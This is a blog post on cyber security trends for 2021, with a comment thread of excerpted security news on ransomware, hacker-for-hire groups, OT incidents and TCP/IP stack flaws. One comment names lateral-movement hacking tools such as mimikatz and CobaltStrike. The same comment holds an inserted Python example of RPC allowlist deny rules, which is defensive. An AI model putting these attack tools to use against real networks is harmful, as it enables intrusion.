Cyber security trends for 2021

Nothing is more difficult than making predictions. For this reason I did not do any “predictions for 2021 cyber security” posting before the year 2021 started. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

The state of internet security in 2020 was hard. The trends that stormed last year will continue well into 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year’s trend was that instead of ‘bring your own device’, these days it is rather ‘bring your own office’.

2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. The 2021 Cybersecurity and IT Failures Roundup article presents lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lessons.

Kaspersky’s top three cybersecurity predictions for 2021 are an increase in targeted attacks, more disruptive attacks exploiting contemporary issues, and continued frequent and significant data breaches. I can pretty much agree with those. Cybersecurity must adapt to counter new threats in a transformed world.

The Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization and stagnation. Naturally, the world is moving ahead, and as the article puts it: “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”

For 2021, Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad for compromising corporate IT and IoT networks. The New Cybersecurity Threat Predictions for 2021 article points out that the traditional network perimeter has been replaced with multiple edge environments (WAN, multi-cloud, data center, remote worker, IoT, and more), each with its own unique risks.

DDoS attacks: Big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid in bitcoin by a deadline – but victims are being urged not to give in to the demands.

One sure bet is that ransomware attacks will only escalate further over this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes: first they encrypt your data so you can’t access it, and then they threaten to publish your most secret data for other people to see if you don’t pay up. As a result, ransomware victims that have backups are paying ransoms to stop hackers from leaking their stolen data.

Modern cybercrime is becoming increasingly open-sourced: some of the most sophisticated and notorious cybercriminals already utilize open-source tools to conduct their criminal activities, and this will increase.

Trend Micro survey results claim that AI is set to replace humans in cybersecurity by 2030. I am just wondering what this claim means, and whether the people who answered the survey have really understood AI and cyber security. My prediction is that we will need humans, AI and even traditional solutions for a long, long time.

The lack of people with cyber security skills is still a problem for many companies, because AI will not replace them any time soon. There are different views on how the situation has developed. The Cybersecurity Skills Shortage Falls for First Time article claims that the shortfall in skills has dropped from 4.07 million last year to 3.12 million. The As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that the information technology industry has a real problem on its hands – and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for their services has dramatically increased. Some companies claim to have invented a “silver bullet” for educating cyber professionals, such as This educator claims to have invented an entertaining way to learn cybersecurity. Some cyber security work is moving to the cloud, so we need more people who know both security and cloud: The Cloud Talent Drought Continues (And Is Even Larger Than You Thought).

The Hackers leverage sophisticated and novel techniques to break into networks article says that the recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents, and expect more similar incidents that have not yet been revealed.

Want to avoid having your online accounts hacked? Enable two-factor authentication. The Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.

A new version of the OWASP Top-10 is coming this year. The OWASP Top-10 2021 Statistics-based proposal article tries to make an OWASP Top-10 2021 prediction calculated from understandable metrics, so that everyone is able to reproduce the results, and presents it to the entire community for feedback.

The Privacy is an illusion. But that’s a good thing article says that everyone’s information is available; it doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back, and some just don’t care. The With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in one future we have a private, anonymous alternative to cash, but in the Black Mirror future the money in your pocket knows everything about you. Cash is dying, that’s for sure. There are still ways to send anonymous emails, and it is a good idea to prepare for your digital life after death.

The Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath make the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom-of-speech issues such as Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.

The Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement, with consumer IoT designs required to have vaguely defined “reasonable security features”. The US government is beginning to create legislation mandating IoT security: the US House of Representatives, for instance, introduced H.R. 1668, the Internet of Things Cybersecurity Improvement Act of 2020. There are also NIST recommendations such as NISTIR 8259, Foundational Cybersecurity Activities for IoT Device Manufacturers. The EU introduces a cyber security IoT standard to protect its citizens, and ENISA Publishes Guidelines on Securing the IoT Supply Chain.

7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: Continuous patch management and security updates, OT transparency for IT stakeholders, Natively secure OT network, Cloud-based access to remote sites instead of VPN, Zero touch onboarding, More cybersecurity in small facilities, Certified cybersecurity products and solutions.

IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. The 6 essential activities to help developers build in IoT cybersecurity article gives some ideas for improving cyber security in your IoT development.

2,203 Comments

  1. Tomi Engdahl says:

    Microsoft will now snitch on you at work like never before
    https://www.zdnet.com/article/microsoft-will-now-snitch-on-you-at-work-like-never-before/

    You think there are limits to what your employer can see you do online? Some new Microsoft updates may make you think a little more about that.

    Reply
  2. Tomi Engdahl says:

    Everything You Need to Know About Web Application Firewalls (WAFs)
    https://wpmudev.com/blog/web-application-firewall-waf-guide/

    Reply
  3. Tomi Engdahl says:

    The hunt for NOBELIUM, the most sophisticated nation-state attack in history https://www.microsoft.com/security/blog/2021/11/10/the-hunt-for-nobelium-the-most-sophisticated-nation-state-attack-in-history/
    This is the second in a four-part blog series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this second post, we’ll explore the investigation in the second episode of the docuseries.

    Reply
  4. Tomi Engdahl says:

    Lazarus hackers target researchers with trojanized IDA Pro https://www.bleepingcomputer.com/news/security/lazarus-hackers-target-researchers-with-trojanized-ida-pro/
    A North Korean state-sponsored hacking group known as Lazarus is again trying to hack security researchers, this time with a trojanized pirated version of the popular IDA Pro reverse engineering application.

    Reply
  5. Tomi Engdahl says:

    Are cybercriminals turning away from the US and targeting Europe instead?
    https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/
    Significant cyberattacks against critical targets in Europe have doubled in the past year, according to EU figures obtained by CNN. And with the announced pressure from the US against major ransomware gangs we can expect these figures to go up even more. For now it is hard to tell whether the increased amount of attacks in Europe is some sort of waterbed effect due to the US government’s harder stance against cybercriminals and ransomware in particular. It could be that it is simply ransomware groups expanding to new markets due to more competition among themselves and greener pastures on the other side of the pond. In the ransomware industry, the time of “spray and pray” is long gone. Most of the well known groups know exactly which kind of targets they want to go after and even when the best time to strike is. So it’s not unlikely that we will see more of these attacks on online shops and large retailers with the shopping season around the corner.

    Reply
  6. Tomi Engdahl says:

    The Far-Reaching Attacks of the Void Balaur Cybermercenary Group https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-far-reaching-attacks-of-the-void-balaur-cybermercenary-group
    As cyberattacks have become a common tool in the offensive arsenals of powerful organizations, an industry has developed that is based around providing cyberattack services, tools, and even training to potential customers. One of the major players in this industry are the so-called “cybermercenaries”, groups or individuals that, as the name suggests, offer different kinds of internet-based products and services to their clients, such as governments, crime organizations, and even businesses, for a price. We have been investigating one of these cybermercenaries, a threat actor known as Void Balaur (aka Rockethack), for more than a year and discovered that the group has been launching cyberattacks against prominent targets, some of which have even resulted in real-life consequences. Our research paper, titled Void Balaur: Tracking a Cybermercenary’s Activities, provides a deep dive into the group’s activities, offerings, targets, connections with other threat actors, and the potential consequences its attacks might have on its victims. Research (PDF):
    https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf

    Reply
  7. Tomi Engdahl says:

    How Artificial intelligence (AI) Stops Cybercriminals
    https://www.hackread.com/how-artificial-intelligence-ai-stops-cybercriminals/
    Newer AI algorithms are extremely good at analyzing data traffic, access, and transfer, as well as detecting outliers or anomalies in data trends. Below are some of the ways AI can prevent and mitigate the damage caused by cybercrime.

    Reply
  8. Tomi Engdahl says:

    Businesses don’t know how to manage VPN security properly – and cyber criminals are taking advantage
    https://www.zdnet.com/article/many-organisations-dont-know-how-to-manage-vpn-security-properly-and-cyber-criminals-are-taking-advantage/
    Remote working has resulted in a rise in the use of corporate VPNs.
    But inexperience means many businesses aren’t equipped to look for and patch security vulnerabilities being exploited by malicious hackers.

    Reply
  9. Tomi Engdahl says:

    RPC Firewall Dubbed ‘Ransomware Kill Switch’ Released to Open Source
    https://www.securityweek.com/rpc-firewall-dubbed-ransomware-kill-switch-released-open-source

    Today at Black Hat London, Zero Networks announced the release of its RPC firewall – also dubbed the ‘ransomware kill switch’ – into open source. The tool provides granular control over RPC, capable of blocking the use of lateral movement hacker tools and stopping almost all ransomware in its tracks.

    Microsoft’s Remote Procedure Call (MS-RPCE) lies at the heart of Windows. It effectively manages the relationship between clients and servers – if a client requests something from a server, it goes through RPC. This happens both locally and between remote devices.

    RPC was introduced into Windows back in the days of Windows 2000 and has been ever-present since then. This has two effects. Firstly, RPC was built with little or no security. While there is a documented Event for a remote RPC call, it hasn’t been implemented. Further, the Event Tracing for Windows (ETW) option will likely result in millions of RPC client/server events every hour, but doesn’t tell you where the call came from, nor which user was concerned.

    Secondly, RPC use has spread over time into every aspect of Windows computing. “There is almost nothing you can do without RPC — whether to get information or change information. Everything is done via RPC,” explains Benny Lakunishok, co-founder and CEO at Zero Networks, and another product of Israel’s IDF conveyor belt.

    Normal attempts to block RPC ports could rapidly cause the network to fail.

    Over the last year, a relatively small number of ransomware gangs have been responsible for the majority of big game hunting ransom attacks: Maze, Conti, REvil, Netwalker, DoppelPaymer, DarkSide and Avaddon. In every case – with the exception of Avaddon – RPC has been used for reconnaissance and lateral movement.

    The common hacker tools used for lateral movement – such as BloodHound, mimikatz, CobaltStrike, PS-Empire, PsExec and WMIC – all use RPC. But you cannot simply block the use of RPC. And even if you are able to detect something, detection is often too late.

    To solve this problem and provide auditing, visibility and control over RPC calls, Zero Networks developed an agent that scans the machine and finds the RPC processes. “The agent hooks into those it finds in a legitimate manner (nothing malicious) so that it sees everything,” Lakunishok told SecurityWeek.

    “We provide full auditing and visibility so we can see, these are calling these RPC functions. Finally, we can map who is calling which RPC function. We can also create a whitelist. Even though RPC supports thousands of functions, only a few are really needed. We allow those and block everything else. We provide granular control over what RPC is doing. We can block the rest. Down the drain goes most of the attack tactics, and tools.”

    More importantly in today’s threat landscape, something like 86% of ransomware will be stopped in its tracks. “Ransomware is a bit simpler in the way it operates,” continued Lakunishok. “If you block just one of the things it uses, it simply doesn’t move anymore.”

    https://zeronetworks.com/

    “Zero Networks for the first time delivers an easy-to-setup, scalable, and effective zero trust solution”

    Reply
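The comment above describes the RPC firewall model in prose: audit which caller invokes which RPC function, allow the few functions that are actually needed, and block and log everything else. The following is an added example written for this page, not Zero Networks' tool nor code from the SecurityWeek article: a small allowlist evaluator that runs over constructed RPC audit records. The interface UUIDs, function names, host names, users and audit lines are all made up for illustration; a real deployment would take them from its own RPC telemetry and its own policy.

```python
"""Added example, not Zero Networks' code: an allowlist evaluator for RPC audit
records, illustrating "allow the few functions that are needed, log and block
everything else". Interface UUIDs, function names, hosts, users and the audit
lines below are all constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class RpcCall:
    timestamp: str
    source_host: str
    user: str
    interface: str   # RPC interface UUID (constructed values below)
    function: str    # called RPC function (constructed names below)


# Constructed policy: interface UUID -> functions allowed on it. An interface
# absent from this map is denied entirely; so is any unlisted function.
ALLOWED_FUNCTIONS = {
    "aaaaaaaa-0000-0000-0000-000000000001": frozenset({"QueryStatus", "EnumShares"}),
    "aaaaaaaa-0000-0000-0000-000000000002": frozenset({"OpenService", "QueryServiceConfig"}),
}

# Constructed: interfaces that may only be driven from designated admin hosts,
# so remote service control stays usable for administrators while being
# blocked from ordinary workstations.
ADMIN_ONLY_INTERFACES = {"aaaaaaaa-0000-0000-0000-000000000002"}
ADMIN_HOSTS = frozenset({"jump01"})

# Constructed audit-line format: ISO timestamp followed by key=value pairs.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) "
    r"iface=(?P<iface>[0-9a-f-]{36}) func=(?P<func>\S+)$"
)


def parse_line(line):
    """Parse one audit line into an RpcCall, or return None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return RpcCall(m["ts"], m["src"], m["user"], m["iface"], m["func"])


def evaluate(call):
    """Return (decision, reason) for one RPC call under the allowlist."""
    allowed = ALLOWED_FUNCTIONS.get(call.interface)
    if allowed is None:
        return "deny", "interface not in allowlist"
    if call.function not in allowed:
        return "deny", "function not in allowlist"
    if call.interface in ADMIN_ONLY_INTERFACES and call.source_host not in ADMIN_HOSTS:
        return "deny", "admin-only interface called from non-admin host"
    return "allow", "matches allowlist"


def process_audit(lines):
    """Evaluate every parseable audit line. Returns the denied calls (with
    reasons) and the caller -> functions map, i.e. who calls which function."""
    denied = []
    callers = defaultdict(set)
    for line in lines:
        call = parse_line(line)
        if call is None:
            continue  # malformed line; a real deployment would alert on these
        callers[(call.source_host, call.user)].add(call.function)
        decision, reason = evaluate(call)
        if decision == "deny":
            denied.append((call, reason))
    return denied, dict(callers)


# Constructed sample audit: routine share enumeration from a workstation,
# service control from the admin jump host, then three calls the allowlist
# blocks (an unlisted function, an admin-only interface from a workstation,
# and an interface that is not needed at all), plus one malformed line.
SAMPLE_AUDIT = [
    "2021-11-10T09:00:01Z src=ws-042 user=alice iface=aaaaaaaa-0000-0000-0000-000000000001 func=EnumShares",
    "2021-11-10T09:00:05Z src=jump01 user=admin iface=aaaaaaaa-0000-0000-0000-000000000002 func=OpenService",
    "2021-11-10T09:01:13Z src=ws-042 user=alice iface=aaaaaaaa-0000-0000-0000-000000000002 func=CreateService",
    "2021-11-10T09:01:14Z src=ws-042 user=alice iface=aaaaaaaa-0000-0000-0000-000000000002 func=OpenService",
    "2021-11-10T09:01:20Z src=ws-042 user=alice iface=aaaaaaaa-0000-0000-0000-000000000009 func=ScheduleTask",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    denied_calls, caller_map = process_audit(SAMPLE_AUDIT)
    for c, why in denied_calls:
        print(f"DENY {c.source_host}/{c.user} {c.function}: {why}")
    for (host, user), funcs in caller_map.items():
        print(f"{host}/{user} -> {sorted(funcs)}")
```

The caller map is the audit side of the model (the "who is calling which RPC function" visibility the comment describes); the deny list is what an enforcement agent would block. Building the allowlist from a period of audit-only observation before switching to enforcement is the usual way to avoid the network failures the article warns about when RPC is blocked wholesale.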
  10. Tomi Engdahl says:

    ICS, OT Cybersecurity Incidents Cost Some U.S. Firms Over $100 Million: Survey
    https://www.securityweek.com/ics-ot-cybersecurity-incidents-cost-some-us-firms-over-100-million-survey

    A report published on Wednesday by the Ponemon Institute and industrial cybersecurity firm Dragos shows that the average cost of a security incident impacting industrial control systems (ICS) or other operational technology (OT) systems is roughly $3 million, and some companies reported costs of over $100 million.

    The report is based on data from a survey of 600 IT, IT security, and OT security practitioners conducted by the Ponemon Institute in the United States.

    Twenty-nine percent of respondents admitted that their organization was hit by ransomware in the past two years, and more than half of them said they had paid an average ransom of more than $500,000. Some organizations reported paying more than $2 million.

    Nearly two-thirds of respondents said they experienced an ICS/OT cybersecurity incident in the past two years. The most common causes were negligent insiders, a maintenance-related issue, or IT security incidents “overflowing” to the OT network due to poor segmentation between IT and OT.

    On average, it took organizations 170 days to detect an incident, 66 days to investigate it, and 80 days to remediate the incident. A calculation based on the total number of hours it would take a team of six people to detect, investigate, and remediate an incident showed a total labor cost of nearly $1 million. Adding roughly $2 million for downtime, legal costs, regulatory fines, and equipment replacement results in an average total cost of approximately $3 million.

    Of the companies that confirmed suffering an incident, 1% said the total cost of the ICS/OT incident exceeded $100 million, and 2% reported costs between $10 million and $100 million. Overall, 13% of respondents said the incident had cost them more than $1 million.

    The report published by Dragos and Ponemon focuses on the “cultural divide” between IT and OT teams and its impact on their ability to secure both IT and OT environments.

    2021 State of Industrial Cybersecurity: The Risks Created by the Cultural Divide Between the IT & OT Teams
    https://hub.dragos.com/hubfs/Reports/2021-Ponemon-Institute-State-of-Industrial-Cybersecurity-Report.pdf?hsLang=en

    Reply
  11. Tomi Engdahl says:

    The Rising Threat Stemming From Identity Sprawl
    https://www.securityweek.com/rising-threat-stemming-identity-sprawl

    Identity sprawl in the age of remote working and business transformation is a threat to cybersecurity

    The identity sprawl generated by remote working and business digitization is out of control. This is the clear message from a global survey of more than 1,000 IT professionals.

    The survey was undertaken by Dimensional Research for One Identity, a provider of unified identity security, and returned similar results across all industry verticals.

    Larry Chinski, One Identity’s VP of global IAM strategy, described the three primary results of the survey (PDF). These are the rapidly expanding and almost unchecked growth in the number of identities in use (sprawl); the large number of different tools used to manage the identities, leading to poor overall visibility; and the need to find a unified approach to identities as a solution.

    “We found that organizations have experienced an enormous amount of identity sprawl, especially over the last two years,” he told SecurityWeek. Eighty-four percent of the respondents said the number of identities they manage has more than doubled. Twenty-five percent said the number of identities they manage has increased by a factor of 10 or more. And 95% of the respondents are struggling to manage them.

    https://www.oneidentity.com/docs/2021-identities-and-security-survey-results-white-paper-29725.pdf

    Reply
  12. Tomi Engdahl says:

    Security is Everywhere. Can Your Services Keep Up?
    https://www.securityweek.com/security-everywhere-can-your-services-keep

    Today’s networks require flexible services designed to accompany efforts to protect any user accessing any service from any location on any device

    Cloud adoption and the rapid transition to remote work have permanently changed how companies do business. And now, as organizations begin to bring employees back to the office using a hybrid work model, organizations have had to deploy highly dynamic and adaptable hybrid networks. These recent changes have resulted in a proliferation of devices and users working from anywhere, which has expanded the digital attack surface and exposed more applications, devices, data, and users to risk.

    Understanding and controlling data, applications, and traffic moving across and between these divergent environments is crucial to maintaining security. But this becomes complicated as hybrid and multi-cloud environments adopt new technologies like zero-trust access (ZTA), zero-trust network access (ZTNA), secure SD-WAN that combine physical, cloud, and endpoint devices into an integrated solution. And it becomes even more complicated when things like identity and access management (IAM) policies and an array of tools designed to protect applications and platforms are added to the mix.

    Reply
  13. Tomi Engdahl says:

    Over 90% of OT Organizations Experienced Cyber Incidents in Past Year: Report
    https://www.securityweek.com/over-90-ot-organizations-experienced-cyber-incidents-past-year-report

    A survey conducted recently by cybersecurity firm Fortinet showed that more than 90% of organizations that use operational technology (OT) systems have experienced some sort of cyber incident in the past year.

    Fortinet’s 2021 State of Operational Technology and Cybersecurity Report is based on responses received in late February and early March from 100 people working for organizations with more than 2,500 employees in the manufacturing, energy and utilities, healthcare, and transportation sectors.

    2021 The State of Operational Technology and Cybersecurity
    https://www.fortinet.com/resources-campaign/operational-technology/2021-the-state-of-operational-technology-and-cybersecurity?utm_source=blog&utm_campaign=2021-the-state-of-operational-technology-and-cybersecurity

    Reply
  14. Tomi Engdahl says:

    Bradley Chambers / 9to5Mac:
    Apple unveils Business Essentials for SMBs, with device management, iCloud storage, and more, starting at $2.99 per month per user and launching in spring 2022 — Apple is introducing a new business offering called Apple Business Essentials that combines device management …

    Apple launches Apple Business Essentials: Device management, storage, onsite repairs, and more for one monthly price
    https://9to5mac.com/2021/11/10/apple-business-essentials/

    Apple is introducing a new business offering called Apple Business Essentials that combines device management, 24/7 phone support for IT and end-users, business iCloud storage, and an option for onsite repairs for businesses of up to 500 employees. The free beta period launches today with the full service coming in the spring of 2022.

    “Small businesses are at the core of our economy, and we’re proud that Apple products play a role in helping these companies grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “Apple Business Essentials is designed to help streamline every step of employee device management within a small business — from setup, onboarding, and upgrading, to accessing fast service and prioritized support, all while keeping data backed up and secure, so companies can focus on running their business.”

    Reply
  15. Tomi Engdahl says:

    Catalin Cimpanu / The Record:
    Trend Micro report details the activities of hacker-for-hire group Void Balaur, which has targeted US telecom companies and others since the mid-2010s — Cyber-security firm Trend Micro has published today a 46-page report detailing the history and activity of a hacker-for-hire group …

    Cyber-mercenary group Void Balaur has been hacking companies for years
    https://therecord.media/cyber-mercenary-group-void-balaur-has-been-hacking-companies-for-years/

    Cyber-security firm Trend Micro has published today a 46-page report detailing the history and activity of a hacker-for-hire group that has been advertising its services in the cybercrime underworld and conducting on-demand intrusions since the mid-2010s.

    Named Void Balaur, the group was involved in attacks that targeted victims for both financial and surveillance gains. Past attacks targeted IT companies, telecoms, and activists, journalists, and religious leaders alike.

    Trend Micro said that because of the large number of target overlaps, it initially thought Void Balaur to be related or a subgroup of APT28 (Pawn Storm), a codename used to track cyberattacks carried out by agents of Russia’s military intelligence agency, the GRU.

    “In total, we have observed a dozen email addresses that were targeted by both Pawn Storm during the period of 2014 to 2015, and by Void Balaur from 2020 to 2021,” Trend Micro said today.

    The Far-Reaching Attacks of the Void Balaur Cybermercenary Group
    https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-far-reaching-attacks-of-the-void-balaur-cybermercenary-group

    As cyberattacks have become a common tool in the offensive arsenals of powerful organizations, an industry has developed that is based around providing cyberattack services, tools, and even training to potential customers.

    Reply
  16. Tomi Engdahl says:

    5 Steps To Improve Your Security API

    https://pentestmag.com/5-steps-to-improve-your-security-api/

    #pentest #magazine #pentestmag #pentestblog #PTblog #API #security #cybersecurity #infosecurity #infosec

    Reply
  17. Tomi Engdahl says:

    https://thehackernews.com/2021/11/researchers-uncover-hacker-for-hire.html
    Researchers Uncover Hacker-for-Hire Group That’s Active Since 2015. A new cyber mercenary hacker-for-hire group dubbed “Void Balaur” has been linked to a string of cyberespionage and data theft activities targeting thousands of entities as well as human rights activists, politicians, and government officials around the world at least since 2015 for financial gain while lurking in the shadows.

    Reply
  18. Tomi Engdahl says:

    FBI: Iranian threat actor trying to acquire leaked data on US organizations https://therecord.media/fbi-iranian-threat-actor-trying-to-acquire-leaked-data-on-us-organizations/
    The US Federal Bureau of Investigation says that a threat actor known to be associated with Iran is currently seeking to acquire data from organizations across the globe, including US targets.

    Reply
  19. Tomi Engdahl says:

    Tiny Font Size Fools Email Filters in BEC Phishing
    https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/
    The One Font BEC campaign targets Microsoft 365 users and uses sophisticated obfuscation tactics to slip past security protections to harvest credentials.

    Reply
  20. Tomi Engdahl says:

    Congress Mulls Ban on Big Ransom Payouts Unless Victims Get Official Say-So https://threatpost.com/congress-ban-ransomware-payouts/176213/
    A U.S. lawmaker has introduced a bill, the Ransomware and Financial Stability Act (H.R.5936) (PDF), that would make it illegal for financial firms to pay ransoms over $100,000 without first getting the government’s permission.

    Reply
  21. Tomi Engdahl says:

    U.S. Gov Announces Support for ‘Paris Call’ Cybersecurity Effort
    https://www.securityweek.com/us-gov-announces-support-paris-call-cybersecurity-effort

    United States Vice President Kamala Harris on Wednesday formally announced support for the Paris Call for Trust and Security in Cyberspace, an international collaborative initiative aimed at advancing cybersecurity.

    Issued in 2018, the Paris Call details nine principles to improve stability in cyberspace through global collaboration, and has been already signed by 79 countries.

    The principles promoted by the Call include:

    Protecting individuals and infrastructure
    Protecting against activity that affects the availability of the Internet
    Protecting the electoral process
    Protecting intellectual property
    Preventing the proliferation of malware and nefarious practices
    Improving the security of digital processes, products and services
    Strengthening an advanced cyber hygiene
    Preventing non-state actors from hacking back
    Promoting international norms in cyberspace

    Through supporting the Call, the United States said it will commit to advancing cybersecurity and preserving an open and reliable Internet.

    Reply
  22. Tomi Engdahl says:

    Nearly 100 TCP/IP Stack Vulnerabilities Found During 18-Month Research Project
    https://www.securityweek.com/nearly-100-tcpip-stack-vulnerabilities-found-during-18-month-research-project

    An 18-month research project has resulted in the discovery of nearly 100 vulnerabilities across more than a dozen TCP/IP stacks.

    The research, named Project Memoria, was conducted by enterprise device security firm Forescout in collaboration with others. It resulted in the discovery of the vulnerabilities tracked as Ripple20, AMNESIA:33, NUMBER:JACK, NAME:WRECK, INFRA:HALT, and NUCLEUS:13.

    TCP/IP stacks are leveraged by a wide range of devices for communication, including medical products, industrial control systems (ICS), printers, and switches.

    Researchers have identified a total of 97 vulnerabilities across 14 TCP/IP stacks, including ones that can be exploited for remote code execution, DoS attacks, or to obtain sensitive information. The flaws impact hundreds of products, with researchers estimating that there are roughly 3 billion vulnerable devices.

    Project Memoria targeted a total of 15 TCP/IP stacks, including CycloneTCP, FNET, FreeBSD, IPnet, lwIP, MPLAB Net, NetX, NicheStack, NDKTCPIP, Nucleus NET, Nut/Net, picoTCP, Treck, uC/TCP-IP, and uIP. In only one of them, lwIP, researchers haven’t found any vulnerabilities.

    Some of these TCP/IP stacks have been around for nearly 30 years, but they are still actively developed. While their developers continue to release patches for vulnerabilities, those patches often don’t make it to end user devices, in large part due to what researchers describe as “silent patching.” Silent patching refers to some developers fixing vulnerabilities without assigning CVE identifiers, which results in device vendors and their customers not knowing about the flaws.

    “[Silently patched vulnerabilities] exist in very critical supply-chain software, so there are millions of devices out there that have been vulnerable for a long time without even their vendors knowing about it because other vendors chose to remain silent,” Forescout said in a report summarizing Project Memoria. “Silently patching a vulnerability does not mean that nobody will get to know about it: these issues tend to be rediscovered again and again.”

    Concluding Project Memoria – Lessons Learned after 18 Months of Vulnerability Research
    https://www.forescout.com/resources/project-memoria-lookback-report/

    Reply
  23. Tomi Engdahl says:

    Enlisting Employees to Fight Cyber Threats
    https://www.securityweek.com/enlisting-employees-fight-cyber-threats

    With another Cybersecurity Awareness Month behind us, this is the perfect time to kick off or refresh a security awareness and training program for employees. The more that non-technical staff employees know about security issues, the better they can recognize, report, and even prevent threats.

    Comprehensive security training is a great way for organizations to enlist employees in the fight against cyber threats. At the same time, such training is highly valued by cybersecurity teams which appreciate having knowledgeable individuals who support their own expertise.

    Year-Round Training

    Most organizations rely too heavily on their cybersecurity pros to protect them from threats, ignoring the painful reality that human error is by far the most common cause of security breaches.

    IBM has found that human error is the cause of up to 95 percent of cybersecurity breaches, and estimates that a data breach costs a company $4.24 million per incident on average.

    Human error can be drastically reduced by raising all employees’ awareness of cybersecurity issues. The most effective way to do that is using year-round training. Regular training courses, offering theory-based and hands-on learning, are essential so employees can gain and keep knowledge. Occasional training simply doesn’t help employees to develop tangible cyber skills.

    Go Beyond Basic Training

    In too many cases, organizations expose employees to pretty much the same basic content each October, presenting such topics as ‘how to spot a phishing email,’ ‘understanding malware and ransomware’, and ‘the dangers of opening unknown attachments.’

    Employee Hands-on Training is not Difficult

    There are plenty of resources (including free ones) that cybersecurity practitioners can use to expose interested employees to security concepts in action.

    A good way to proceed is to create an outline that covers basic cybersecurity terminology and concepts, includes an overview of the threat landscape and threat actors, and then delves into the nuts and bolts of cybersecurity, security operations, digital forensics, data analysis, and so on.

    Day in the Life of the SOC

    Additionally, cybersecurity teams can host a tour of the security operations center (SOC), or even a more hands-on day in the life of the SOC. The day visit should be built around modules and challenges that present real IT infrastructure, real threats, and real solutions.

    The goal of the visit should be to inspire new cybersecurity advocates cross-functionally and to identify hidden talent ideal for a SOC Analyst position.

    Conclusion

    To combat constant cybersecurity threats, reduce human error, and cut the punitive costs of breaches, organizations need to provide all employees with advanced, year-round training. Cybersecurity advocates throughout the company are the best defense against threat actors.

    Reply
  24. Tomi Engdahl says:

    The Wild West of the Nascent Cyber Insurance Industry
    https://www.securityweek.com/wild-west-nascent-cyber-insurance-industry

    Cyber Insurance is a work in progress, with many existing customers effectively guinea pigs

    The basic problem for the cyber insurance industry is easy to state but hard to solve. Income (premiums) must exceed outgoings (claims) by around 30% (operating costs + profit). If claims increase, so must premiums for the insurance model to remain viable.

    But the cost of cybercrime is rising dramatically and has been doing so consistently for many years. Continually increasing premiums to counter continuously increasing claims is ultimately unsustainable. Sooner or later, the cost of insurance will make it too expensive to be an effective form of risk management for business. The insurance industry must therefore find an alternative method of balancing its books if it is to succeed.

    There is a potential solution. Decreasing costs (claims) improves the profit/loss ratio much faster than increasing sales (premiums). This is the area now being considered by the insurance industry. First, costs can be reduced by increasing exclusions in the insurance policy – but that decreases the value of insurance as a risk management tool, and there is a finite limit to its use. Second, if the customers’ security posture can be improved sufficiently to reduce claims, then the cost of insurance can also decrease (or at least be maintained at current levels).

    Reply
  25. Tomi Engdahl says:

    Contrast Security Raises $150 Million at ‘Unicorn’ Valuation
    https://www.securityweek.com/contrast-security-raises-150-million-unicorn-valuation

    Code security company Contrast Security this week announced that it has closed $150 million Series E funding round at a billion-dollar valuation, making the company the latest cybersecurity unicorn.

    The company offers a platform that helps developers create more secure applications by discovering vulnerabilities in code, detecting what libraries are being used, and goes as far as providing embedded runtime exploit prevention that analyzes application runtime to prevent and confirm exploitability of bugs.

    Contrast says the investment will help it meet demand for its platform and that it will use the funds to accelerate global expansion plans, to further gain market share. The new infusion of cash will also help the company “execute on strategic opportunities and acquisitions.”

    Reply
  26. Tomi Engdahl says:

    Cybercriminals are interested in education and research – in Finland also in the defence forces
    https://www.uusiteknologia.fi/2021/11/12/verkkorikolliset-ovat-kiinnostuneita-koulutuksesta-ja-tutkimuksesta/

